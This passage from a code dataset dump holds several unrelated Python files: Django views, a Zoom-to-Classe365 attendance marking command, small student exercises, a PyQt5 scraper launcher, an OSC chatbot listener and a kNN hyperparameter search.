request.data.get('processo_desc', None)\n processo_id = request.data.get('processo_id', None)\n data_inicio = request.data.get('data_inicio', None)\n data_fim = request.data.get('data_fim', None)\n\n queryset = ''\n\n try:\n data_inicio = data_inicio + ' 00:00:00'\n data_fim = data_fim + ' 23:59:59'\n\n date_inicio = datetime.strptime(data_inicio, \"%d/%m/%Y %H:%M:%S\")\n date_fim = datetime.strptime(data_fim, \"%d/%m/%Y %H:%M:%S\")\n if processo:\n queryset = Procedimento.objects.filter(processo__descricao=processo)\n\n elif processo_id:\n queryset = Procedimento.objects.filter(processo__id=processo_id)\n\n if queryset:\n\n queryset = queryset.filter(hora_inicio__range=(date_inicio, date_fim))\n\n externo = []\n interno = []\n for procedimento in queryset:\n if procedimento.tipo == 1:\n externo.append(procedimento)\n else:\n interno.append(procedimento)\n if queryset:\n\n filtro = {\n 'procedimento': '', # queryset[0].processo.descricao,\n 'data_inicio': data_inicio,\n 'data_fim': data_fim}\n\n serializer_externo = RelatorioPeriodoSerializar(externo, 
many=True)\n serializer_interno = RelatorioPeriodoSerializar(interno, many=True)\n\n data = {\n 'filtro': filtro,\n 'setup_externo': serializer_externo.data,\n 'setup_interno': serializer_interno.data\n }\n else:\n data = {'mensagem': 'Nenhum dado encontrado'}\n return Response(data, status=status.HTTP_200_OK)\n else:\n msg = 'Dados informados não encontrados'\n print(msg, 'queryset >> ', queryset)\n return Response({'mensagem': msg}, status=status.HTTP_404_NOT_FOUND)\n\n except Exception as e:\n print('error > ', e.args[0])\n return Response({'mensagem': e.args[0]}, status=status.HTTP_400_BAD_REQUEST)\n\n","repo_name":"marcelcunha1991/smed","sub_path":"setup/viewsets.py","file_name":"viewsets.py","file_ext":"py","file_size_in_byte":20671,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"35025206205","text":"############################################################\n# Licensed under the BSD 3-Clause License #\n# See https://github.com/knokbak/college/blob/main/LICENSE #\n############################################################\n\ndef division(a, b):\n try:\n val = float(a) / float(b)\n except ValueError:\n print(\"Error: Cannot divide by a non-numeric value\")\n exit(1)\n except ZeroDivisionError:\n print(\"Error: Cannot divide by zero\")\n exit(1)\n else:\n print(\"Oh my goodness, I can divide!!!!\")\n return val\n\ndef main():\n num1 = input(\"enter number: \")\n num2 = input(\"enter another number: \")\n print(f\"the answer is...{division(num1, num2)}\")\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"knokbak/college","sub_path":"python/11-errors/bad-program.py","file_name":"bad-program.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"36788864197","text":"import json\nimport logging\nimport os\nimport re\nimport requests\n\nfrom django.core.management.base import BaseCommand\nfrom collections import defaultdict\nfrom datetime import time, datetime, timedelta, date\n\n\nfrom dotenv import load_dotenv\n\nfrom dashboard.models import (\n Claas, \n IncorrectTopic,\n # IsAttendanceMarked,\n Section, \n Student,\n Subject, \n Teacher, \n TeacherZoomDetails, \n IncorrectTopic,\n # WrongEmail,\n ClaasAlias,\n)\nfrom dashboard.utils import fetch_date_time\nfrom attendance.models import StoreOnlineAttendance\n\n\n\nload_dotenv()\nlogger = logging.getLogger(__name__)\nlogging.basicConfig(\n format='%(asctime)s-%(levelname)s - %(message)s', datefmt='%d-%b-%y %H:%M:%S')\n\nclass Command(BaseCommand):\n help = 'Get All Teachers Past meetings'\n\n def get_teacher_meetings(self, teacher_zoom_id):\n\n get_meetings_url = f'https://api.zoom.us/v2/users/{teacher_zoom_id}/meetings'\n\n header_token = os.getenv('ZOOM_API_TOKEN')\n headers = {'Authorization': f'Bearer {header_token}'}\n params = {'page_size': 300}\n payload = {}\n\n response = requests.get(\n get_meetings_url, params=params, headers=headers, json=payload\n )\n\n # NOTE: IF WE DON'T GET A VALID RESPONSE WE RETURN\n if response.status_code != 200:\n return {'status': False, 'message': 'unable to fetch meeting details'}\n\n response_json = response.json()\n\n # NOTE: WE WILL CHECK IF THERE ARE MORE MEETINGS WHICH WE CAN GET BY next_page_token\n meetings = response_json['meetings']\n\n while response_json['next_page_token']:\n params['next_page_token'] = response_json['next_page_token']\n\n response = requests.get(\n get_meetings_url, params=params, headers=headers, 
json=payload\n )\n\n response_json = response.json()\n meetings.extend(response_json['meetings'])\n\n return {'status': True, 'message': meetings}\n\n\n\n def get_subject_class_section_from_topic(self, topic_name):\n\n ''' NOTE: to fetch the details of class, section, subject from the meeting's topic '''\n\n splitted_topic = topic_name.split('/')\n\n if len(splitted_topic) < 3 :\n return {'status': False, 'message': 'The topic name is not valid'}\n\n subject = splitted_topic[0].strip().lower().split()\n subject = ''.join(subject)\n\n claas = splitted_topic[1].strip().lower().split()\n claas = ''.join(claas)\n\n try:\n claas_alias_qs = ClaasAlias.objects.get(name__iexact = claas)\n claas = claas_alias_qs.claas.claas_name_for_comparison\n except ClaasAlias.MultipleObjectsReturned:\n return {\n 'status': False,\n 'message' : 'Multiple Objects returned'\n }\n except ClaasAlias.DoesNotExist:\n return {\n 'status': False,\n 'message': 'The Class Alias is not present in our database'\n }\n\n sections = []\n for i in range(2, len(splitted_topic)):\n section = splitted_topic[i].strip().lower().split()\n section = ''.join(section)\n\n sections.append(\"section\" + section)\n\n return {\n 'status': True, \n 'message': {\n 'claas': claas,\n 'subject': subject,\n 'sections': sections,\n }}\n\n\n\n def find_subject_claas_section_ids(self, subject, claas, sections):\n\n # NOTE: while marking attendance we need class id which is stored in a separate table\n try:\n claas_id = Claas.objects.get(\n claas_name_for_comparison = claas\n ).claas_id\n except:\n return {'status': False, 'message': 'the claas name mentioned is incorrect'}\n\n # NOTE: while marking attendance we need section id which is stored in a separate table\n section_ids = []\n\n for section in sections:\n try:\n section_id = Section.objects.get(\n section_name_for_comparison = section, \n claas__claas_name_for_comparison = claas\n ).section_id\n section_ids.append(section_id)\n except:\n return {'status': False, 'message': 'The Section name mentioned is incorrect'}\n\n # TODO: MAY BE ISSUE SINCE WE HAVE MULTIPLE SECTION\n # NOTE: while marking attendance we need subject id which is stored in a separate table\n subject_ids = []\n\n for section_id in section_ids:\n try:\n subject_id = Subject.objects.get(\n subject_name_for_comparison = subject, \n section__section_id = section_id\n ).subject_id\n subject_ids.append(subject_id)\n except:\n return {'status': False, 'message': 'The Subject name mentioned is incorrect'}\n\n return {'status': True, 'message': {\n 'claas_id': claas_id,\n 'section_ids': section_ids,\n 'subject_ids': subject_ids,\n }}\n\n\n\n def get_meeting_instances(self, meeting_id):\n\n instances_url = f\"https://api.zoom.us/v2/past_meetings/{meeting_id}/instances\"\n\n header_token = os.getenv('ZOOM_API_TOKEN')\n headers = {'Authorization': f'Bearer {header_token}'}\n params = {}\n payload = {}\n\n instances_response = requests.get(\n instances_url, params=params, headers=headers, json=payload\n )\n\n # NOTE: IF WE DON'T GET VALID RESPONSE WE RETURN\n if instances_response.status_code != 200:\n return {'status': False, 'message': 'Unable to fetch the instances'}\n\n instances_response_json = instances_response.json()['meetings']\n\n # NOTE: IF THE RESPONSE IS VALID, WE WILL RETURN THE INSTANCES\n return {'status': True, 'message': instances_response_json}\n\n\n\n def get_instance_metrics(self, instance_uuid):\n\n # TODO: ALSO CHECK FOR NEXT PAGE TOKEN AND ADD THOSE\n metrics_url = 
f\"https://api.zoom.us/v2/metrics/meetings/{instance_uuid}/participants?type=past\"\n\n header_token = os.getenv('ZOOM_API_TOKEN')\n headers = {'Authorization': f'Bearer {header_token}'}\n params = { 'page_size': 300 }\n payload = {}\n\n metrics_response = requests.get(\n metrics_url, params=params, headers=headers, json=payload\n )\n\n # NOTE: IF WE DON'T GET VALID RESPONSE WE RETURN\n if metrics_response.status_code != 200:\n return {'status': False, 'message': 'Unable to fetch the metrics of the instance'}\n\n metrics_response_json = metrics_response.json()['participants']\n\n # NOTE: IF THE RESPONSE IS VALID WE WILL RETURN THE PARTICIPANTS\n return {'status': True, 'message': metrics_response_json}\n\n\n\n def get_active_time_of_participant(self, curr_participant):\n\n join_time = curr_participant['join_time'].split('T')[1]\n joined_at = time(int(join_time[:2]), int(\n join_time[3:5]), int(join_time[6:8]))\n joined_delta = timedelta(\n hours=joined_at.hour, minutes=joined_at.minute, seconds=joined_at.second)\n\n leave_time = curr_participant['leave_time'].split('T')[1]\n leaved_at = time(int(leave_time[:2]), int(\n leave_time[3:5]), int(leave_time[6:8]))\n leaved_delta = timedelta(\n hours=leaved_at.hour, minutes=leaved_at.minute, seconds=leaved_at.second)\n\n active_time = leaved_delta - joined_delta\n active_time = (active_time.seconds // 60) % 60\n\n return active_time\n\n\n\n # def generate_attendance_data(self, attendance_data, total_active_time_of_participants):\n\n # min_active_time_for_attendance = os.getenv('GET_MIN_ACTIVE_TIME_FOR_ATTENDANCE')\n\n # # NOTE: CHECK IF THE EMAIL IS PRESENT IN OUR STUDENT DATABASE OR NOT\n # for key in total_active_time_of_participants.keys():\n # try:\n # student_obj = Student.objects.get(email=key)\n\n # is_present = \"p\" if total_active_time_of_participants[key] >= int(min_active_time_for_attendance) else \"a\"\n\n # attendance_data[student_obj.student_id] = {\"status\": is_present, \"comment\": \"\"}\n # except:\n # pass\n\n # return {'status': True, 'message': 'Successfully generated'}\n\n\n\n def generate_current_section_attendance_data(self, total_active_time_of_participants, section_id):\n\n min_active_time_for_attendance = os.getenv('GET_MIN_ACTIVE_TIME_FOR_ATTENDANCE')\n curr_section_attendance_data = {}\n\n students = Student.objects.filter(section__section_id = section_id)\n\n for student in students:\n student_is_present = total_active_time_of_participants.get(student.email)\n\n is_meeting_criteria = \"a\"\n if student_is_present and total_active_time_of_participants[student.email] >= int(min_active_time_for_attendance):\n is_meeting_criteria = \"p\"\n \n curr_section_attendance_data[student.student_id] = { \"status\": is_meeting_criteria, \"comment\": \"\" }\n\n \n\n # # NOTE: FILTER STUDENTS WHO BELONGS TO THIS SECTION ONLY\n # for key in attendance_data.keys():\n # temp = Student.objects.filter(\n # student_id=key, \n # section__section_id=section_id\n # )\n\n # if temp:\n # curr_section_attendance_data[key] = attendance_data[key]\n # else:\n # pass\n\n # curr_section_attendance_data_json = json.dumps(\n # curr_section_attendance_data)\n\n return {'status': True, 'message': curr_section_attendance_data}\n\n\n def get_date_in_string(self, date_time_obj):\n \n date_in_string = date_time_obj.strftime(\"%Y-%m-%d\")\n\n return date_in_string\n\n\n def mark_classe_365_attendance(\n self,\n claas_id,\n section_id,\n subject_id,\n meeting_time,\n attendance_data,\n curr_instance_uuid,\n meeting_topic,\n curr_meeting_id,\n wrong_emails,\n 
curr_teacher_email,\n ):\n\n attendance_data_json = json.dumps(attendance_data)\n\n # print(attendance_data_json)\n # return\n\n academic_id = os.getenv('GET_ACADEMIC_ID')\n\n attendance_url = os.getenv('GET_MANAGE_ATTENDANCE_DATA_URL')\n header_token = os.getenv('CLASSE365_TOKEN')\n headers = {'Authorization': f'Basic {header_token}'}\n\n date = self.get_date_in_string(meeting_time)\n\n payload = {\n 'acds_id': int(academic_id),\n 'class_id': int(claas_id),\n 'section_id': int(section_id),\n 'subject_id': int(subject_id),\n 'date': date,\n 'working': 1,\n 'attendance_data': attendance_data_json\n }\n print()\n print(payload)\n\n\n # TODO: TEMPORARY\n # return\n\n\n manage_attendance_classe_365_response = requests.post(\n attendance_url, headers=headers, data=payload\n )\n\n manage_attendance_classe_365_response_json = manage_attendance_classe_365_response.json()\n\n \n try:\n is_attendance_marked_obj = StoreOnlineAttendance.objects.get(\n uuid = curr_instance_uuid\n )\n except StoreOnlineAttendance.DoesNotExist:\n section_obj = Section.objects.get(section_id = section_id)\n\n is_attendance_marked_obj = StoreOnlineAttendance(\n uuid = curr_instance_uuid,\n topic_name = meeting_topic,\n section = section_obj,\n date = meeting_time,\n attendance_status = json.loads(attendance_data_json),\n wrong_emails = wrong_emails,\n )\n\n\n if manage_attendance_classe_365_response_json['success'] == 1:\n is_attendance_marked_obj.is_marked = True\n is_attendance_marked_obj.save()\n print('attendance marked successfully')\n logger.error('attendance marked successfully')\n\n # logger.error(f\"Attendance has been marked successfully for the instance with uuid {curr_instance_uuid}\")\n else:\n is_attendance_marked_obj.is_marked = False\n is_attendance_marked_obj.save()\n\n print('error in marking attendance')\n logger.error(f\"Unable to mark attendance of the instance with uuid {curr_instance_uuid} in classe 365\")\n logger.error(\n str( datetime.now().date() )\n + \n f\" : Topic - {meeting_topic}. \"\n +\n f\"The topic is incorrect of meeting with id : {curr_meeting_id}. \"\n + \n f\"The teacher's email is : {curr_teacher_email}\"\n\n )\n\n\n\n\n def handle(self, *args, **kwargs):\n\n all_teachers = TeacherZoomDetails.objects.all()\n\n ''' NOTE: WE ITERATE OVER ALL TEACHERS AND GET IT'S MEETINGS AND MARK THE ATTENDANCE '''\n for teacher in all_teachers:\n\n print('\\n\\n\\nBEGIN :- \\nteacher zoom id' + str(teacher.zoom_id))\n\n response_meetings = self.get_teacher_meetings(teacher.zoom_id)\n\n # NOTE: IF UNABLE TO FETCH MEETINGS, WE CONITNUE FOR NEXT TEACHER\n if not response_meetings['status']:\n logger.error(\n str(datetime.now().date())\n +\n f\" : Unable to fetch the teacher meeting with id {teacher.zoom_id}. 
\"\n + \n f\"Teacher's email is : {teacher.teacher.email}.\"\n )\n continue\n\n # NOTE: IF WE GET A VALID RESPONSE\n meetings = response_meetings['message']\n\n\n for curr_meeting in meetings:\n\n print('topic' + curr_meeting['topic'])\n print('meeting id' + str(curr_meeting['id']))\n\n meeting_topic_splitted = curr_meeting['topic'].split('+')\n\n for meeting_topic in meeting_topic_splitted:\n\n ''' NOTE: IF MEETING ID IS ALREADY PRESENT IN INCORRECT TOPIC TABLE IGNORE IT '''\n is_present = IncorrectTopic.objects.filter(meeting_id = curr_meeting['id'])\n\n if is_present:\n logger.debug(\"The meeting's topic name is incorrect and already added in the incorrect topic table.\")\n continue\n\n response_topic = self.get_subject_class_section_from_topic(\n meeting_topic\n )\n\n\n # TODO: SEND EMAIL TO LOTUS PETAL TEAM\n # NOTE: IF THE TOPIC NAME FORMAT IS INCORRECT\n if not response_topic['status']:\n teacher_name = teacher.teacher.first_name + teacher.teacher.last_name\n meeting_start_time_str = curr_meeting.get('start_time')\n\n incorrect_topic_obj = IncorrectTopic(\n topic = meeting_topic,\n meeting_id = curr_meeting['id'],\n teacher_name = teacher_name,\n )\n if meeting_start_time_str:\n meeting_start_time = fetch_date_time(meeting_start_time_str)\n incorrect_topic_obj.meeting_time = meeting_start_time\n \n incorrect_topic_obj.save()\n \n logger.error(\n str( datetime.now().date() )\n + \n f\" : Topic - {meeting_topic}. \"\n +\n f\"The topic is incorrect of meeting with id : {curr_meeting['id']}. \"\n + \n f\"The teacher's email is : {teacher.teacher.email}\"\n )\n continue\n\n\n response_topic_message = response_topic['message']\n subject = response_topic_message['subject']\n claas = response_topic_message['claas']\n sections = response_topic_message['sections']\n\n response_subject_claas_section_ids = self.find_subject_claas_section_ids(\n subject, \n claas, \n sections\n )\n\n\n # TODO: SEND EMAIL TO THE LOTUS PETAL TEAM\n # NOTE: IF EITHER SUBJECT, CLAAS, OR SECTION IS INCORRECT OR NOT PRESENT IN OUR DB\n if not response_subject_claas_section_ids['status']:\n teacher_name = teacher.teacher.first_name + teacher.teacher.last_name\n meeting_start_time_str = curr_meeting.get('start_time')\n\n incorrect_topic_obj = IncorrectTopic(\n topic = meeting_topic,\n meeting_id = curr_meeting['id'],\n teacher_name = teacher_name\n )\n if meeting_start_time_str:\n meeting_start_time = fetch_date_time(meeting_start_time_str)\n incorrect_topic_obj.meeting_time = meeting_start_time\n\n incorrect_topic_obj.save()\n\n logger.error(\n str(datetime.now().date())\n + \n f\" : Topic - {meeting_topic}. \"\n +\n f\"Either the subject - {subject}, class - {claas}, or sections - {sections} is incorrect\"\n +\n f\" or not in our database of the meeting with id {curr_meeting['id']}. \"\n +\n f\"The teacher's email is : {teacher.teacher.email}.\"\n )\n continue\n\n response_subject_claas_section_ids_message = response_subject_claas_section_ids['message']\n\n claas_id = response_subject_claas_section_ids_message['claas_id']\n section_ids = response_subject_claas_section_ids_message['section_ids']\n subject_ids = response_subject_claas_section_ids_message['subject_ids']\n\n\n response_meeting_instances = self.get_meeting_instances(curr_meeting['id'])\n\n # NOTE: IF THERE IS ERROR WHILE FETCHING MEETING INSTANCES\n if not response_meeting_instances['status']:\n logger.error(\n str(datetime.now().date())\n + \n f\" : Unable to fetch meeting instance of meeting with id {curr_meeting['id']}. 
\"\n + \n f\"The teacher's email is : {teacher.teacher.email}.\"\n )\n continue\n\n curr_meeting_instances = response_meeting_instances['message']\n\n for curr_instance in curr_meeting_instances:\n\n # TODO: FROM .ENV FILE and in native time obj\n meetings_before_date_to_ignore = '2021-09-13'\n\n # TODO: MAKE IT IN SEPARATE FUNCTION\n # NOTE: IGNORE MEETINGS CONDUCTED BEFORE AUGUST\n curr_instance_date = curr_instance['start_time'].split('T')[0]\n\n curr_instance_meeting_time = fetch_date_time(curr_instance['start_time'])\n\n # TODO: Make this comparision through datetime function not string\n if curr_instance_date < meetings_before_date_to_ignore:\n print(\n str(datetime.now().date())\n +\n f\" : Since the meeting is of before {meetings_before_date_to_ignore} \"\n +\n f\"the attendance wont be marked. The instance uuid is {curr_instance['uuid']}\"\n )\n logger.error(\n str(datetime.now().date())\n +\n f\" : Since the meeting is of before {meetings_before_date_to_ignore} \"\n +\n f\"the attendance wont be marked. The instance uuid is {curr_instance['uuid']}\"\n )\n continue\n\n ''' NOTE: Ignore future meetings '''\n curr_time = datetime.now()\n if curr_instance_meeting_time > curr_time:\n print(\n str(datetime.now().date())\n + \n f\" : Since the meeting is of future timestamp :{curr_time} \"\n +\n f\"the attendance won't be marked. The instance uuid is {curr_instance['uuid']}\"\n )\n continue\n\n # NOTE: IGNORE MEETINGS WHOSE ATTENDANCE IS ALREADY MARKED\n curr_instance_uuid = curr_instance['uuid']\n\n try:\n is_attendance_marked = StoreOnlineAttendance.objects.get(\n uuid = curr_instance_uuid\n )\n\n if is_attendance_marked.is_marked:\n print(\n str(datetime.now().date())\n + \n f\"the attendance is already marked for the instance with uuid {curr_instance['uuid']}\"\n )\n continue\n except:\n pass\n\n response_instance_metrics = self.get_instance_metrics(\n curr_instance_uuid\n )\n\n # NOTE: IF THERE IS ERROR WHILE FETCHING METRICS\n if not response_instance_metrics['status']:\n logger.error(f\"Unable to fetch metrics data of the instance with uuid {curr_instance['uuid']}\")\n continue\n\n curr_instance_metrics = response_instance_metrics['message']\n\n\n total_active_time_of_participants = defaultdict(int)\n wrong_emails = {}\n\n for curr_participant in curr_instance_metrics:\n\n # NOTE: CHECKING WHETHER THE PARTICIPANT HAS JOINED WITH EMAIL OR NOT\n email = curr_participant.get('email')\n user_name = curr_participant.get('user_name')\n\n if not email: \n wrong_emails[user_name] = ''\n continue\n \n ''' NOTE: We check whether the domain is of lotuspetal ? 
'''\n regex = r'^[A-Za-z0-9._%+-]+@lotuspetalfoundation.org$'\n is_lotuspetal_domain = re.fullmatch(regex, email)\n\n if not is_lotuspetal_domain:\n wrong_emails[user_name] = email\n continue\n \n # TODO:\n active_time = self.get_active_time_of_participant(\n curr_participant\n )\n\n total_active_time_of_participants[email] += active_time\n\n # attendance_data = {}\n\n # self.generate_attendance_data(\n # attendance_data, \n # total_active_time_of_participants\n # )\n\n # NOTE: iterating on all section whose class has been conducted together\n # bcos we have to mark the attendance separately\n for i in range(len(section_ids)):\n section_id = section_ids[i]\n subject_id = subject_ids[i]\n \n # TODO: MIN ACTIVE TIME ?\n response_generate_current_section_attendance_data = self.\\\n generate_current_section_attendance_data(\n # attendance_data, \n total_active_time_of_participants,\n section_id\n )\n\n curr_section_attendance_data = response_generate_current_section_attendance_data['message']\n\n if not curr_section_attendance_data:\n is_attendance_marked_obj_present = StoreOnlineAttendance.objects.filter(\n uuid = curr_instance_uuid\n )\n\n if not is_attendance_marked_obj_present:\n section_obj = Section.objects.get(section_id=section_id)\n\n is_attendance_marked_obj = StoreOnlineAttendance(\n uuid = curr_instance_uuid,\n topic_name = meeting_topic,\n section = section_obj,\n # period \n date = curr_instance_meeting_time,\n attendance_status = json.dumps(curr_section_attendance_data),\n wrong_emails = wrong_emails,\n is_marked = False,\n )\n is_attendance_marked_obj.save()\n \n logger.error(f\"the attendance json didn't have any object of the instance with uuid {curr_instance['uuid']}\")\n continue\n \n print('correct topic')\n logger.debug('correct topic')\n print('zoom id' + str(teacher.zoom_id))\n logger.debug('zoom id' + str(teacher.zoom_id))\n print('topic' + curr_meeting['topic']+'\\n')\n logger.debug('topic' + curr_meeting['topic']+'\\n')\n\n self.mark_classe_365_attendance(\n claas_id,\n section_id,\n subject_id,\n curr_instance_meeting_time,\n curr_section_attendance_data, \n curr_instance_uuid, \n meeting_topic,\n curr_meeting['id'],\n wrong_emails,\n teacher.teacher.email\n )\n\n print('\\n\\n END :- ')\n logger.info('\\n\\n END :- ')\n\n print('TASK - MARK ATTENDANCE IS COMPLETE !!')\n logger.info('TASK - MARK ATTENDANCE IS COMPLETE !!')","repo_name":"Nadeem1432/Lotus-Petal-Algofocus","sub_path":"dashboard/management/commands/get_teachers_meeting.py","file_name":"get_teachers_meeting.py","file_ext":"py","file_size_in_byte":28285,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19185552625","text":"# def fun(m,n):\n# l=[]\n# for i in range(m,n):\n# if isPrime(i):\n# l.append(i)\n# return l\n\n# check whether number prime or not \n# def isPrime(n):\n# for i in range(2,n//2):\n# if n%i==0:\n# return False\n# return True\n\n# m=int(input())\n# n= int(input())\n# print(isPrime(n))\n# print(fun(m,n))\n\ndef primefactor(n):\n for i in range(2,n+1):\n if n%i==0 and isPrime(i):\n print(i)\n\ndef isPrime(n):\n for i in range(2,n//2+1):\n if n%i==0:\n return False\n return True\nn=int(input())\n\nprint(primefactor(n))\n\n\n\n\n","repo_name":"SriramSololearner/Python","sub_path":"Functions/listOfPrime.py","file_name":"listOfPrime.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"6807033575","text":"from PyQt5.QtWidgets import 
*\r\nfrom multiprocessing import Process\r\nfrom threading import Thread\r\nfrom app import Scraper\r\nfrom ui_app import *\r\nimport sys, os\r\n\r\n\r\ndef resource_path(relative_path):\r\n \"\"\" Get absolute path to resource, works for dev and for PyInstaller \"\"\"\r\n try:\r\n # PyInstaller creates a temp folder and stores path in _MEIPASS\r\n base_path = sys._MEIPASS\r\n except Exception:\r\n base_path = os.path.abspath(\".\")\r\n\r\n return os.path.join(base_path, relative_path)\r\n\r\nICON = resource_path(\"assets/code.ico\")\r\nprint(ICON)\r\n\r\nclass Dialog(QDialog):\r\n\tdef __init__(self, parent=None):\r\n\t\tsuper().__init__(parent)\r\n\r\n\t\tself.setWindowTitle(\"A minute!\")\r\n\r\n\t\tQBtn = QDialogButtonBox.Save | QDialogButtonBox.Cancel \r\n\r\n\t\tself.buttonBox = QDialogButtonBox(QBtn)\r\n\t\tself.buttonBox.accepted.connect(self.save)\r\n\t\tself.buttonBox.rejected.connect(self.cancel)\r\n\r\n\t\tself.layout = QVBoxLayout()\r\n\t\tself.message = QLabel(\"Enter a path to your chrome driver\")\r\n\t\tself.input_ = QLineEdit()\r\n\t\tself.input_.setGeometry(QRect(10, 10, 200, 30))\r\n\t\tself.layout.addWidget(self.message)\r\n\t\tself.layout.addWidget(self.input_)\r\n\t\tself.layout.addWidget(self.buttonBox)\r\n\t\tself.setLayout(self.layout)\r\n\t\tself.show()\r\n\r\n\tdef save(self):\r\n\t\tprint(\"saving..\")\r\n\t\twith open(os.path.join(os.getenv(\"APPDATA\"), \"driver_path.txt\"), \"w\") as f:\r\n\t\t\tf.write(self.input_.text())\r\n\t\tself.close()\r\n\r\n\tdef cancel(self):\r\n\t\tprint(\"cancelling...\")\r\n\t\tsys.exit()\r\n\r\nclass MainWindow(QMainWindow):\r\n\tdef __init__(self) -> None:\r\n\t\tQMainWindow.__init__(self)\r\n\t\tself.ui = Ui_MainWindow()\r\n\t\tself.ui.setupUi(self)\r\n\t\tself.setWindowTitle(\"Web Automator\")\r\n\t\tself.setWindowIcon(QIcon(ICON))\r\n\t\tself.ui.start_btn.clicked.connect(self.initialize_scraper)\r\n\t\tself.ui.user_input.returnPressed.connect(self.user_entry)\r\n\t\tself.driver_path_fname = os.path.join(os.environ[\"APPDATA\"], \"driver_path.txt\")\r\n\t\tself.current_event = None\r\n\r\n\t\tself.show()\r\n\t\r\n\tdef initialize_scraper(self):\r\n\t\tif not os.path.exists(self.driver_path_fname):\r\n\t\t\tdlg = Dialog(self)\r\n\t\t\tif not dlg.exec():\r\n\t\t\t\tprint(\"Dialog closed!\")\r\n\t\t\t\t\r\n\t\t\t\tself.scraper = Scraper\r\n\t\t\t\tscr = Thread(target=self.scraper, args=(self, self.driver_path_fname))\r\n\t\t\t\tscr.start()\r\n\t\t\t\tself.ui.start_btn.setEnabled(False)\r\n\t\telse:\r\n\t\t\tself.scraper = Scraper\r\n\t\t\tscr = Thread(target=self.scraper, args=(self, self.driver_path_fname))\r\n\t\t\tscr.start()\r\n\t\t\tself.ui.start_btn.setEnabled(False)\r\n \t\r\n\tdef user_entry(self, dt=None):\r\n\t\ttry:\r\n\t\t\tself.__setattr__(self.current_event, True)\r\n\t\texcept TypeError:\r\n\t\t\tself.ui.user_input.setText(\"\")\r\n \r\n\tdef set_event(self, evtname):\r\n\t\tprint(evtname)\r\n\t\tsetattr(self, evtname, None)\r\n\t\tself.current_event = evtname\r\n\t\t\r\n\r\nif __name__=='__main__':\r\n app = QApplication(sys.argv)\r\n window = MainWindow()\r\n sys.exit(app.exec_())\r\n","repo_name":"isaacrobert33/Status-Bot","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2827,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31662915866","text":"\nfrom __future__ import print_function, division\nimport sys, osc, os\n\n\nclass BotResponse(object):\n \n def __init__(self, osc_server_port=5005, osc_client_host='127.0.0.1', 
osc_client_port=5009):\n self.osc_server_port = osc_server_port\n self.osc_client_host = osc_client_host\n self.osc_client_port = osc_client_port\n self.osc_client = osc.Client(osc_client_host, osc_client_port)\n self.osc_server = osc.Server(host='0.0.0.0', port=osc_server_port, callback=self.osc_server_message)\n self.osc_server.run(non_blocking=True)\n \n self.osc_client.send(\"/botresponse/ready\")\n \n #self.model = torch.load(model_filename, map_location=lambda storage, loc: storage, encoding='utf8')\n #if default_allowed_filename is None:\n #self.allowed = set(self.model.dictionary.idx2word)\n #else:\n #self.allowed = set(open(default_allowed_filename).read().split('\\n'))\n #self.allowed.update('.,!:;')\n \n print(\"Ready For Getting Bot Response\")\n\n\n def osc_server_message(self, message, args):\n print(\"message entrant {}\".format(args))\n \n if '/iagotchi/botresponse' in message:\n message = message.replace('/iagotchi/botresponse', '')\n print('botresponse : {}'.format(args))\n \n elif '/iagotchi/user_tmp' in message:\n message = message.replace('/iagotchi/user', '')\n print('user_tmp : {}'.format(message))\n \n elif '/iagotchi/user' in message:\n message = message.replace('/iagotchi/user', '')\n print('user : {}'.format(message))\n \n elif '/iagotchi/session/start' in message:\n message = message.replace('/iagotchi/session/start', '')\n print('sesson start at: {}'.format(message))\n \n elif '/iagotchi/session/stop' in message:\n message = message.replace('/iagotchi/session/stop', '')\n print('session stop at: {}'.format(message))\n \n elif '/iagotchi/session/name' in message:\n message = message.replace('/iagotchi/session/name', '')\n print('user name is : {}'.format(message))\n elif message == '/exit':\n self.osc_server.shutdown()\n sys.exit(0)\n\n\nif __name__ == '__main__':\n BotResponse()\n","repo_name":"kleag/iagotchi-lasti","sub_path":"iagotchi-bot/botresponse.py","file_name":"botresponse.py","file_ext":"py","file_size_in_byte":2367,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"75"} +{"seq_id":"21642227402","text":"\"\"\"\nThis program first reads the training and test data from the user\nand then performs a hyperparameter search using GridSearchCV to f\nind the best k value for the kNN Classifier. 
Finally, it trains \nthe kNN Classifier with the best k value and calculates the test accuracy.\n\"\"\"\nimport numpy as np\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import accuracy_score\n\ndef read_data(num_samples):\n x_values = []\n y_values = []\n for i in range(num_samples):\n x = float(input(f\"Enter x value for sample {i + 1}: \"))\n y = int(input(f\"Enter y value for sample {i + 1}: \"))\n x_values.append(x)\n y_values.append(y)\n return np.array(x_values), np.array(y_values)\n\nN = int(input(\"Enter the number of training samples (N): \"))\nM = int(input(\"Enter the number of test samples (M): \"))\ntrain_x, train_y = read_data(N)\ntest_x, test_y = read_data(M)\n\n# Range of k values to search\nk_values = list(range(1, 11))\n\n\nknn = KNeighborsClassifier()\nparam_grid = {'n_neighbors': k_values}\ngrid_search = GridSearchCV(knn, param_grid, cv=5)\ngrid_search.fit(train_x.reshape(-1, 1), train_y)\n\nbest_k = grid_search.best_params_['n_neighbors']\n\n# train the model with the best k\nbest_knn = KNeighborsClassifier(n_neighbors=best_k)\nbest_knn.fit(train_x.reshape(-1, 1), train_y)\n\n# Make predictions on the test set\ntest_predictions = best_knn.predict(test_x.reshape(-1, 1))\n\n# Calculate the test accuracy\ntest_accuracy = accuracy_score(test_y, test_predictions)\n\n# Output the results\nprint(f\"Best k for kNN Classifier: {best_k}\")\nprint(f\"Test Accuracy: 